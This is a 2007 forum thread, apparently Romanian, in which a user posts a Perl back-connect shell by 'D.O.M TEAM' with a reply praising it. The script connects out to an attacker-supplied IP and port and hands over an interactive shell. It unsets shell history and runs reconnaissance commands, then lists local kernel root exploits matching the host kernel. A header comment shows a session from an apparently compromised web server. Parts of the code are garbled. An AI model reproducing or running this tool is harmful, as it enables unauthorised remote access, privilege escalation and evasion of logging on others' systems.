zbeng Posted June 24, 2007 Report Share Posted June 24, 2007 #!/usr/bin/perl# D.O.M TEAM - 2007# anonyph; arp; ka0x; xarnuz# 2005 - 2007# BackConnectShell + Rootlab t00l# priv8!# [email]3sk0rbut0@gmail.com[/email]## Backconnect by data cha0s (modificada por D.O.M)# r00t l4b by D.O.M## ka0x:~/Desktop # ./nc -lvvp 8600# listening on [any] 8600 ...# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA# ******* ConnectBack Shell *******# Linux version 2.6.9-022stab078.14-smp (root@kern268.build.sw.ru) (gcc version 3.# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006# apache# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2523(psaserv)# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest# Kernel local:# 2.6.9-022stab078.14-smp# P0sible 3xploit: exp.sh# P0sible 3xploit: krad3# P0sible 3xploit: newsmp# P0sible 3xploit: ptrace_kmod# P0sible 3xploit: py2# P0sible 3xploit: ong_bak# P0sible 3xploit: prctl3# P0sible 3xploit: prctl# P0sible 3xploit: kmdx# P0sible 3xploit: pwned## sh: no job control in this shell# sh-2.05b$use IO::Socket; use Socket;use FileHandle; $system = '/bin/bash';if(!$ARGV[0]) {print "\nBackConnect Shell - D.O.M TEAM\n\n";print "Usage: perl $0 [IPHOST] [NCPORT]\n";print "Example: perl $0 82.85.55.21 6850\n\n"; exit;} socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die print "[-] Protocolo Desconocido\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) || die print "[-] Error Socket\n";print "[+] BackConnect Shell\n";print "[+] Conectando a $ARGV[0]... \n";print "[+] Enviando Shell... \n";print "[+] Conectado. \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET");print "\n******* ConnectBack Shell *******\n\n"; system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");# Rootkernelmy $khost = `uname -r`;chomp($khost);print "\nKernel local: $khost\n\n";my %h;$hsd_'w00t' = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] };$hsd_'brk' = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] };$hsd_'ave' = { vuln=>['2.4.19','2.4.20'] };$hsd_'elflbl' = { vuln=>['2.4.29'] };$hsd_'elfdump' = { vuln=>['2.4.27'] };$hsd_'expand_stack' = { vuln=>['2.4.29'] };$hsd_'h00lyshit' = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] };$hsd_'kdump' = { vuln=>['2.6.13'] };$hsd_'km2' = { vuln=>['2.4.18','2.4.22'] };$hsd_'krad' = { vuln=>['2.6.11'] };$hsd_'krad3' = { vuln=>['2.6.11','2.6.9'] };$hsd_'local26' = { vuln=>['2.6.13'] };$hsd_'loko' = { vuln=>['2.4.22','2.4.23','2.4.24'] };$hsd_'mremap_pte' = { vuln=>['2.4.20','2.2.25','2.4.24'] };$hsd_'newlocal' = { vuln=>['2.4.17','2.4.19'] };$hsd_'ong_bak' = { vuln=>['2.4.','2.6.'] };$hsd_'ptrace' = { vuln=>['2.2.24','2.4.22'] };$hsd_'ptrace_kmod' = { vuln=>['2.4.','2.6.'] };$hsd_'ptrace24' = { vuln=>['2.4.9'] };$hsd_'pwned' = { vuln=>['2.4.','2.6.'] };$hsd_'py2' = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] };$hsd_'raptor_prctl' = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] };$hsd_'prctl3' = { vuln=>['2.6.13','2.6.17','2.6.9'] };$hsd_'remap' = { vuln=>['2.4.'] };$hsd_'rip' = { vuln=>['2.2.'] };$hsd_'stackgrow2' = { vuln=>['2.4.29','2.6.10'] };$hsd_'uselib24' = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] };$hsd_'newsmp' = { vuln=>['2.6.'] };$hsd_'smpracer' = { vuln=>['2.4.29'] };$hsd_'loginx' = { vuln=>['2.4.22'] };$hsd_'exp.sh' = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] };$hsd_'prctl' = { vuln=>['2.6.'] };$hsd_'kmdx' = { vuln=>['2.6.','2.4.'] };&busca;sub busca {foreach my $key(keys %h){foreach my $kernel ( @sd_ $hsd_$key{'vuln' } ){ if($khost=~/^$kernel/){ chop($kernel) if ($kernel=~/\.$/); print "P0sible 3xploit: ". $key ."\n"; } } }}print "\n";system 'export TERM=xterm;exec sh -i';system($system); Quote Link to comment Share on other sites More sharing options...
Guest flama Posted June 25, 2007 Report Share Posted June 25, 2007 foarte interesant ... cred ca ai greshit totushi sectziunea acesta fiind coltzul programatorilor ... shi cum nu tu ai programat ... mai potrivit era hack tools. iti sugerez sa il mutzi, sa iti dai warn shi sa iti tragi shi 2 palme peste fund. oricum e usefull toolu gg. Quote Link to comment Share on other sites More sharing options...